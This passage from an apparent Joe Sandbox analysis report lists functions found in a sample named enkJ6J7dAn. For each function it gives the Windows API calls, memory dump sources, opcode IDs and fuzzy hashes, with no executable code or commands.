                                                                                                                    • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                    Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_strncmp
                                                                                                                    • String ID: >$U$\
                                                                                                                    • API String ID: 2666721431-237099441
                                                                                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                    Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221674350-0
                                                                                                                    • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                    • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                    • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                    • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                    Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$_wcscat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2037614760-0
                                                                                                                    • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                    • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                    • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                    • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                    Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 960795272-0
                                                                                                                    • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                    • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                    • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                    • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                    Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4189319755-0
                                                                                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                    Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1976402638-0
                                                                                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                    Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 642888154-0
                                                                                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                    Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Copy$ClearErrorLast
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 2487901850-572801152
                                                                                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                    Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1871949834-0
                                                                                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                    Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                    Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                    • SendMessageW.USER32 ref: 00471AE3
                                                                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3611059338-0
                                                                                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                    Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1640429340-0
                                                                                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                    Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • _wcslen.LIBCMT ref: 004438CD
                                                                                                                    • _wcslen.LIBCMT ref: 004438E6
                                                                                                                    • _wcstok.LIBCMT ref: 004438F8
                                                                                                                    • _wcslen.LIBCMT ref: 0044390C
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                    • _wcstok.LIBCMT ref: 00443931
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3632110297-0
                                                                                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                    Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
